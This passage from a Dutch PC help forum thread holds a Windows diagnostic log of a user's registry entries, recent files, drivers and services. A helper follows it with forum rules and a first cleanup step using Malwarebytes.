"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]

"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CleanHlp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CleanHlp.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"ConsentPromptBehaviorAdmin"=5

"ConsentPromptBehaviorUser"=3

"EnableUIADesktopToggle"=0

"dontdisplaylastusername"=0

"legalnoticecaption"=

"legalnoticetext"=

"shutdownwithoutlogon"=1

"undockwithoutlogon"=1

"DisableCAD"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]

"NoActiveDesktop"=1

"NoActiveDesktopChanges"=1

"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]

"vidc.mrle"=msrle32.dll

"vidc.msvc"=msvidc32.dll

"msacm.imaadpcm"=imaadp32.acm

"msacm.msg711"=msg711.acm

"msacm.msgsm610"=msgsm32.acm

"msacm.msadpcm"=msadp32.acm

"midimapper"=midimap.dll

"wavemapper"=msacm32.drv

"VIDC.UYVY"=msyuv.dll

"VIDC.YUY2"=msyuv.dll

"VIDC.YVYU"=msyuv.dll

"VIDC.IYUV"=iyuv_32.dll

"vidc.i420"=iyuv_32.dll

"VIDC.YVU9"=tsbyuv.dll

"msacm.l3acm"=C:\Windows\System32\l3codeca.acm

"MSVideo8"=VfWWDM32.dll

"wave1"=wdmaud.drv

"midi1"=wdmaud.drv

"mixer1"=wdmaud.drv

"aux1"=wdmaud.drv

"wave"=wdmaud.drv

"midi"=wdmaud.drv

"mixer"=wdmaud.drv

"aux"=wdmaud.drv

"wave2"=wdmaud.drv

"mixer2"=wdmaud.drv

"midi2"=wdmaud.drv

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1

.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2014-11-28 19:06:22 ----D---- C:\Program Files\trend micro

2014-11-28 19:06:21 ----D---- C:\rsit

2014-11-28 15:50:00 ----D---- C:\Program Files (x86)\Emsisoft Anti-Malware

2014-11-27 12:19:15 ----A---- C:\Windows\SYSWOW64\FlashPlayerInstaller.exe

2014-11-25 20:57:13 ----D---- C:\Program Files (x86)\ESET

2014-11-25 20:08:41 ----D---- C:\ProgramData\HitmanPro

2014-11-25 16:22:04 ----D---- C:\Program Files (x86)\BuyNsave

2014-11-25 16:21:54 ----D---- C:\ProgramData\13031386700010600142

2014-11-25 16:21:53 ----D---- C:\ProgramData\fglelgmopjjbdjgcgecdmkpfdagmmgef

2014-11-20 11:08:06 ----A---- C:\Windows\SYSWOW64\pku2u.dll

2014-11-20 11:08:06 ----A---- C:\Windows\system32\pku2u.dll

2014-11-20 11:08:06 ----A---- C:\Windows\system32\kerberos.dll

2014-11-20 11:08:05 ----A---- C:\Windows\SYSWOW64\kerberos.dll

2014-11-17 16:13:27 ----D---- C:\Users\Jordan\AppData\Roaming\MetaGeek

2014-11-15 20:44:51 ----D---- C:\Program Files (x86)\Mozilla Firefox

2014-11-12 16:02:58 ----D---- C:\Users\Jordan\AppData\Roaming\uTorrent

2014-11-12 15:41:26 ----A---- C:\Windows\SYSWOW64\adtschema.dll

2014-11-12 15:41:26 ----A---- C:\Windows\system32\termsrv.dll

2014-11-12 15:41:26 ----A---- C:\Windows\system32\drivers\ksecpkg.sys

2014-11-12 15:41:26 ----A---- C:\Windows\system32\adtschema.dll

2014-11-12 15:41:25 ----A---- C:\Windows\system32\lsasrv.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\sspicli.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\secur32.dll

2014-11-12 15:41:24 ----A---- C:\Windows\SYSWOW64\msaudite.dll

2014-11-12 15:41:24 ----A---- C:\Windows\system32\msaudite.dll

2014-11-12 15:41:09 ----A---- C:\Windows\SYSWOW64\ieetwproxystub.dll

2014-11-12 15:41:08 ----A---- C:\Windows\SYSWOW64\mshtmled.dll

2014-11-12 15:41:08 ----A---- C:\Windows\SYSWOW64\iernonce.dll

2014-11-12 15:41:08 ----A---- C:\Windows\system32\ieetwproxystub.dll

2014-11-12 15:41:08 ----A---- C:\Windows\system32\ieetwcollector.exe

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\urlmon.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\msfeeds.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\JavaScriptCollectionAgent.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\iedkcs32.dll

2014-11-12 15:41:07 ----A---- C:\Windows\SYSWOW64\dxtrans.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\JavaScriptCollectionAgent.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\iernonce.dll

2014-11-12 15:41:07 ----A---- C:\Windows\system32\ie4uinit.exe

2014-11-12 15:41:06 ----A---- C:\Windows\SYSWOW64\mshtml.dll

2014-11-12 15:41:05 ----A---- C:\Windows\SYSWOW64\iesetup.dll

2014-11-12 15:41:05 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll

2014-11-12 15:41:05 ----A---- C:\Windows\system32\urlmon.dll

2014-11-12 15:41:05 ----A---- C:\Windows\system32\iedkcs32.dll

2014-11-12 15:41:04 ----A---- C:\Windows\SYSWOW64\jscript9diag.dll

2014-11-12 15:41:04 ----A---- C:\Windows\SYSWOW64\iertutil.dll

2014-11-12 15:41:04 ----A---- C:\Windows\system32\ieetwcollectorres.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\jsproxy.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\ieUnatt.exe

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\ieui.dll

2014-11-12 15:41:03 ----A---- C:\Windows\SYSWOW64\dxtmsft.dll

2014-11-12 15:41:03 ----A---- C:\Windows\system32\MsSpellCheckingFacility.exe

2014-11-12 15:41:03 ----A---- C:\Windows\system32\msfeeds.dll

2014-11-12 15:41:03 ----A---- C:\Windows\system32\dxtrans.dll

2014-11-12 15:41:02 ----A---- C:\Windows\SYSWOW64\ieframe.dll

2014-11-12 15:41:02 ----A---- C:\Windows\system32\iesetup.dll

2014-11-12 15:41:01 ----A---- C:\Windows\system32\ieapfltr.dll

2014-11-12 15:41:00 ----A---- C:\Windows\system32\iertutil.dll

2014-11-12 15:40:58 ----A---- C:\Windows\SYSWOW64\mshtmlmedia.dll

2014-11-12 15:40:58 ----A---- C:\Windows\SYSWOW64\jscript9.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\wininet.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\vbscript.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\msrating.dll

2014-11-12 15:40:57 ----A---- C:\Windows\SYSWOW64\MshtmlDac.dll

2014-11-12 15:40:57 ----A---- C:\Windows\system32\jsproxy.dll

2014-11-12 15:40:57 ----A---- C:\Windows\system32\ieUnatt.exe

2014-11-12 15:40:56 ----A---- C:\Windows\system32\ieui.dll

2014-11-12 15:40:56 ----A---- C:\Windows\system32\ieframe.dll

2014-11-12 15:40:56 ----A---- C:\Windows\system32\dxtmsft.dll

2014-11-12 15:40:55 ----A---- C:\Windows\system32\mshtmled.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\mshtmlmedia.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\jscript9diag.dll

2014-11-12 15:40:54 ----A---- C:\Windows\system32\jscript9.dll

2014-11-12 15:40:53 ----A---- C:\Windows\system32\wininet.dll

2014-11-12 15:40:53 ----A---- C:\Windows\system32\vbscript.dll

2014-11-12 15:40:52 ----A---- C:\Windows\system32\MshtmlDac.dll

2014-11-12 15:40:51 ----A---- C:\Windows\system32\msrating.dll

2014-11-12 15:40:50 ----A---- C:\Windows\system32\mshtml.dll

2014-11-12 15:40:09 ----A---- C:\Windows\SYSWOW64\msxml3.dll

2014-11-12 15:40:09 ----A---- C:\Windows\system32\msxml3.dll

2014-11-12 15:40:07 ----A---- C:\Windows\SYSWOW64\msxml3r.dll

2014-11-12 15:40:07 ----A---- C:\Windows\system32\msxml3r.dll

2014-11-12 15:40:04 ----A---- C:\Windows\SYSWOW64\IMJP10K.DLL

2014-11-12 15:40:04 ----A---- C:\Windows\system32\IMJP10K.DLL

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AudioSes.dll

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AUDIOKSE.dll

2014-11-12 15:40:00 ----A---- C:\Windows\SYSWOW64\AudioEng.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\EncDump.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\audiosrv.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AudioSes.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AUDIOKSE.dll

2014-11-12 15:40:00 ----A---- C:\Windows\system32\AudioEng.dll

2014-11-12 15:39:52 ----A---- C:\Windows\system32\schannel.dll

2014-11-12 15:39:51 ----A---- C:\Windows\system32\ncrypt.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\wdigest.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\TSpkg.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\schannel.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\ncrypt.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\msv1_0.dll

2014-11-12 15:39:50 ----A---- C:\Windows\SYSWOW64\credssp.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\wdigest.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\TSpkg.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\msv1_0.dll

2014-11-12 15:39:50 ----A---- C:\Windows\system32\credssp.dll

2014-11-12 15:39:33 ----A---- C:\Windows\SYSWOW64\packager.dll

2014-11-12 15:39:33 ----A---- C:\Windows\system32\win32k.sys

2014-11-12 15:39:33 ----A---- C:\Windows\system32\packager.dll

2014-11-12 15:39:28 ----A---- C:\Windows\SYSWOW64\msi.dll

2014-11-12 15:39:28 ----A---- C:\Windows\system32\msi.dll

2014-11-12 15:39:22 ----A---- C:\Windows\SYSWOW64\oleaut32.dll

2014-11-12 15:39:22 ----A---- C:\Windows\system32\oleaut32.dll

2014-11-08 10:44:54 ----D---- C:\Users\Jordan\AppData\Roaming\KeePass

2014-11-08 10:44:07 ----D---- C:\Program Files (x86)\KeePass Password Safe

2014-10-30 09:10:05 ----A---- C:\Windows\system32\drivers\ssudmdm.sys

2014-10-30 09:10:05 ----A---- C:\Windows\system32\drivers\ssudbus.sys

2014-10-30 09:08:30 ----A---- C:\Windows\SYSWOW64\secman.dll

2014-10-29 21:35:16 ----A---- C:\Windows\system32\drivers\avgidsdrivera.sys

======List of files/folders modified in the last 1 month======

2014-11-28 19:06:22 ----RD---- C:\Program Files

2014-11-28 19:06:01 ----D---- C:\Windows\Temp

2014-11-28 19:05:53 ----A---- C:\Windows\SYSWOW64\TempWmicBatchFile.bat

2014-11-28 16:26:20 ----D---- C:\Users\Jordan\AppData\Roaming\Dropbox

2014-11-28 15:59:58 ----RD---- C:\Program Files (x86)

2014-11-28 15:59:58 ----D---- C:\Windows\system32\drivers

2014-11-28 15:42:42 ----D---- C:\Windows\system32\config

2014-11-28 15:38:48 ----AD---- C:\ProgramData\TEMP

2014-11-28 15:38:21 ----D---- C:\Program Files (x86)\SpywareBlaster

2014-11-28 15:33:31 ----D---- C:\Windows\System32

2014-11-28 15:30:11 ----D---- C:\ProgramData\MFAData

2014-11-27 12:57:53 ----D---- C:\Windows\system32\catroot2

2014-11-27 12:19:55 ----D---- C:\Windows\Prefetch

2014-11-27 12:19:53 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe

2014-11-27 12:19:25 ----SHD---- C:\Windows\Installer

2014-11-27 12:19:25 ----SHD---- C:\Config.Msi

2014-11-27 12:19:15 ----D---- C:\Windows\SysWOW64

2014-11-25 20:29:01 ----SHD---- C:\System Volume Information

2014-11-25 20:08:41 ----HD---- C:\ProgramData

2014-11-25 16:37:37 ----D---- C:\Users\Jordan\AppData\Roaming\vlc

2014-11-25 16:22:06 ----D---- C:\ProgramData\AVG2015

2014-11-23 11:55:52 ----D---- C:\Windows\pss

2014-11-22 19:25:11 ----D---- C:\Users\Jordan\AppData\Roaming\HandBrake

2014-11-21 16:44:24 ----D---- C:\Windows\winsxs

2014-11-20 11:03:51 ----D---- C:\Windows\system32\catroot

2014-11-18 12:05:32 ----D---- C:\Windows\Microsoft.NET

2014-11-18 11:31:35 ----D---- C:\Windows\inf

2014-11-18 11:31:35 ----A---- C:\Windows\system32\PerfStringBackup.INI

2014-11-18 10:13:36 ----RSD---- C:\Windows\assembly

2014-11-16 15:40:28 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service

2014-11-16 10:37:29 ----HD---- C:\$AVG

2014-11-15 16:35:57 ----D---- C:\Users\Jordan\AppData\Roaming\dvdcss

2014-11-15 15:48:14 ----D---- C:\Windows\Tasks

2014-11-12 16:35:55 ----D---- C:\Windows\SYSWOW64\nl-NL

2014-11-12 16:35:55 ----D---- C:\Windows\system32\nl-NL

2014-11-12 16:35:54 ----D---- C:\Windows\SYSWOW64\en-US

2014-11-12 16:35:54 ----D---- C:\Windows\system32\en-US

2014-11-12 16:35:54 ----D---- C:\Program Files\Internet Explorer

2014-11-12 16:35:54 ----D---- C:\Program Files (x86)\Internet Explorer

2014-11-12 16:35:48 ----D---- C:\ProgramData\Microsoft Help

2014-11-12 16:32:35 ----D---- C:\Windows\system32\MRT

2014-11-12 16:25:06 ----A---- C:\Windows\system32\MRT.exe

2014-11-08 11:22:14 ----D---- C:\Program Files\Recuva

2014-11-07 21:25:42 ----D---- C:\Windows\system32\Tasks

2014-10-30 11:28:39 ----D---- C:\Users\Jordan\AppData\Roaming\TeamViewer

2014-10-30 11:21:39 ----D---- C:\Program Files\CCleaner

2014-10-30 11:20:34 ----D---- C:\Users\Jordan\AppData\Roaming\Samsung

2014-10-30 11:20:34 ----D---- C:\Program Files (x86)\Samsung

2014-10-30 11:20:31 ----D---- C:\Program Files (x86)\InstallShield Installation Information

2014-10-30 11:19:10 ----D---- C:\ProgramData\Samsung

2014-10-30 11:18:47 ----D---- C:\Windows

2014-10-30 09:40:37 ----D---- C:\Windows\system32\DriverStore

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 amd_sata;amd_sata; C:\Windows\system32\DRIVERS\amd_sata.sys [2012-10-11 82600]

R0 amd_xata;amd_xata; C:\Windows\system32\DRIVERS\amd_xata.sys [2012-10-11 42664]

R0 AVGIDSHA;AVGIDSHA; C:\Windows\system32\DRIVERS\avgidsha.sys [2014-06-18 190744]

R0 Avgloga;AVG Logging Driver; C:\Windows\system32\DRIVERS\avgloga.sys [2014-07-18 313624]

R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield; C:\Windows\system32\DRIVERS\avgmfx64.sys [2014-10-05 124184]

R0 Avgrkx64;AVG Anti-Rootkit Driver; C:\Windows\system32\DRIVERS\avgrkx64.sys [2014-06-18 31512]

R0 iusb3hcs;Intel® USB 3.0 hostcontrollerswitch-stuurprogramma; C:\Windows\system32\DRIVERS\iusb3hcs.sys [2013-02-22 20464]

R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]

R1 A2DDA;A2 Direct Disk Access Support Driver; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [2013-03-28 26176]

R1 Avgdiska;AVG Disk Driver; C:\Windows\system32\DRIVERS\avgdiska.sys [2014-06-18 153368]

R1 AVGIDSDriver;AVGIDSDriver; C:\Windows\system32\DRIVERS\avgidsdrivera.sys [2014-10-29 263960]

R1 Avgldx64;AVG AVI Loader Driver; C:\Windows\system32\DRIVERS\avgldx64.sys [2014-08-28 243480]

R1 Avgtdia;AVG TDI Driver; C:\Windows\system32\DRIVERS\avgtdia.sys [2014-10-10 274200]

R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]

R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-14 59904]

R3 a2acc;a2acc; \??\C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [2014-05-12 71472]

R3 amdhub30;AMD USB 3.0 Hub Driver; C:\Windows\system32\DRIVERS\amdhub30.sys [2012-11-28 107688]

R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-02-14 11635200]

R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-02-14 578560]

R3 amdxhc;AMD USB 3.0 Host Controller Driver; C:\Windows\system32\DRIVERS\amdxhc.sys [2012-11-28 228008]

R3 AthBTPort;Qualcomm Atheros Virtual Bluetooth Class; C:\Windows\system32\DRIVERS\btath_flt.sys [2012-08-10 88728]

R3 athr;Qualcomm Atheros Extensible Wireless LAN device driver; C:\Windows\system32\DRIVERS\athrx.sys [2013-03-11 3879936]

R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2012-02-23 95760]

R3 BTATH_A2DP;Bluetooth A2DP Audio Driver; C:\Windows\system32\drivers\btath_a2dp.sys [2012-08-10 344216]

R3 btath_avdt;Qualcomm Atheros Bluetooth AVDT Service; C:\Windows\system32\drivers\btath_avdt.sys [2012-08-10 114840]

R3 BTATH_BUS;Qualcomm Atheros Bluetooth Bus; C:\Windows\system32\DRIVERS\btath_bus.sys [2012-08-10 33944]

R3 BTATH_HCRP;Bluetooth HCRP Server driver; C:\Windows\system32\DRIVERS\btath_hcrp.sys [2012-08-10 178840]

R3 BTATH_LWFLT;Bluetooth LWFLT Device; C:\Windows\system32\DRIVERS\btath_lwflt.sys [2012-08-10 77464]

R3 BTATH_RCP;Bluetooth AVRCP Device; C:\Windows\system32\DRIVERS\btath_rcp.sys [2012-08-10 135832]

R3 BtFilter;BtFilter; C:\Windows\system32\DRIVERS\btfilter.sys [2012-08-10 567808]

R3 BthEnum;Bluetooth-stuurprogramma voor aanvraagblok; C:\Windows\system32\DRIVERS\BthEnum.sys [2009-07-14 41984]

R3 BthPan;Bluetooth-apparaat (Personal Area Network); C:\Windows\system32\DRIVERS\bthpan.sys [2009-07-14 118784]

R3 BTHUSB;USB-stuurprogramma voor Bluetooth-radio; C:\Windows\System32\Drivers\BTHUSB.sys [2011-04-28 80384]

R3 cleanhlp;cleanhlp; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [2013-12-04 57024]

R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT64.sys [2012-08-20 1608864]

R3 ETD;ELAN PS/2 Port Input Device; C:\Windows\system32\DRIVERS\ETD.sys [2012-10-05 328592]

R3 L1C;NDIS Miniport Driver for Qualcomm Atheros AR81xx PCI-E Ethernet Controller; C:\Windows\system32\DRIVERS\L1C62x64.sys [2013-03-04 127568]

R3 MBAMSwissArmy;MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys []

R3 PSI;PSI; C:\Windows\system32\DRIVERS\psi_mf_amd64.sys [2013-12-06 18456]

R3 RFCOMM;Bluetooth-apparaat (RFCOMM Protocol TDI); C:\Windows\system32\DRIVERS\rfcomm.sys [2009-07-14 158720]

R3 rtsuvc;Realtek USB 2.0 PC Camera; C:\Windows\system32\DRIVERS\rtsuvc.sys [2013-03-06 8243144]

R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2010-11-21 109056]

S3 AmUStor;AM USB Stroage Driver; C:\Windows\system32\drivers\AmUStor.SYS [2013-10-18 100992]

S3 ApfiltrService;Alps Pointing-device Filter Driver; C:\Windows\system32\DRIVERS\Apfiltr.sys []

S3 BTHPORT;Stuurprogramma voor Bluetooth-poort; C:\Windows\System32\Drivers\BTHport.sys [2012-07-06 552960]

S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudbus.sys [2014-06-16 110336]

S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]

S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]

S3 PSKMAD;PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [2013-04-29 47632]

S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]

S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]

S3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudmdm.sys [2014-06-16 206080]

S3 ssudserd;SAMSUNG Mobile USB Diagnostic Serial Port(DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudserd.sys [2014-01-22 206080]

S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]

S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-21 88960]

S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2012-08-23 29696]

S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]

S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]

S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-21 117248]

S3 usbrndis6;USB RNDIS6-adapter; C:\Windows\system32\DRIVERS\usb80236.sys [2013-02-12 19968]

S3 usbscan;Stuurprogramma voor USB-scanner; C:\Windows\system32\DRIVERS\usbscan.sys [2013-07-03 42496]

S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys []

S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]

S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]

S3 vwifimp;Microsoft Virtual WiFi Miniport Service; C:\Windows\system32\DRIVERS\vwifimp.sys [2009-07-14 17920]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 a2AntiMalware;Emsisoft Protection Service; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [2014-10-13 4816568]

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-09-12 64704]

R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-02-14 240640]

R2 AtherosSvc;AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [2012-08-10 211584]

R2 AVGIDSAgent;AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [2014-11-09 3488784]

R2 avgwd;AVG WatchDog; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [2014-11-09 298080]

R2 CronService;Cron Service for Prey; C:\Prey\platform\windows\cronsvc.exe [2013-05-08 23552]

R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]

R2 CxAudMsg;@C:\Windows\system32\CxAudMsg64.exe,-100; C:\Windows\system32\CxAudMsg64.exe [2013-10-18 201376]

R2 Secunia PSI Agent;Secunia PSI Agent; C:\Program Files (x86)\Secunia\PSI\PSIA.exe [2013-12-06 1229528]

R2 Secunia Update Agent;Secunia Update Agent; C:\Program Files (x86)\Secunia\PSI\sua.exe [2013-12-06 662232]

R2 TeamViewer8;TeamViewer 8; C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe [2013-10-01 5087584]

R2 Virtual Router;VirtualRouterService; C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe [2013-02-10 12288]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-09-11 105144]

S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-09-11 124088]

S2 gupdate;Google Update-service (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-20 116648]

S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-27 267440]

S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]

S3 gupdatem;Google Update-service (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-20 116648]

S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2014-03-05 136120]

S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2014-11-06 114688]

S3 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files (x86)\Microsoft Office\Office12\GrooveAuditService.exe [2009-02-26 64856]

S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2014-11-15 114288]

S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2011-07-20 440696]

S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]

S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]

S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]

S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-19 1255736]

S4 aspnet_state;ASP.NET-statusservice; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2013-09-11 51808]

S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]

-----------------EOF-----------------

[Gast Emphyrio]

Hoi jordan99 en welkom op PC Helpfourm,

• 
  
• Log enkel in als beheerder met alle rechten.
  
• Het opruimen van je systeem kan wat tijd in beslag nemen, wees geduldig.
  
• Blijf bij het topic totdat ik gemeldt heb dat je PC clean is.
  
• Als je iets niet weet of verstaat, vraag het dan even aub.
  
• Installeer of deinstalleer géén software of hardware terwijl we met je probleem bezig zijn.
  
• Ga ondertussen niet wat "anders" proberen, dat maakt het alleen maar moeilijker voor ons.

.

Opmerking: Alle tools steeds uitvoeren als admin.

De instructies die worden gegeven, zijn enkel geldig voor jouw PC.

---

Stap 1:

Malware scannen en verwijderen....

Installeer MBAM 2.0 (info & download link)

Start MBAM.

Klik bovenin het scherm van Malwarebytes Anti-Malware op Scan.

Kies in het scherm voor de bedreigingsscan en klik vervolgens op de knop Scan nu.

Voor het scannen wordt er altijd eerst automatisch gecontroleerd of er updates van de virusdefinities beschikbaar zijn,

indien er een update beschikbaar is, moet je deze eerst laten installeren.

Wanneer de scan gereed is en er bedreigingen zijn gedetecteerd krijg je hier een overzicht van.

Selecteer om allen in quarantaine te plaatsen.

Bij de melding dat uw computer opnieuw opgestart moet worden klik je op Ja.

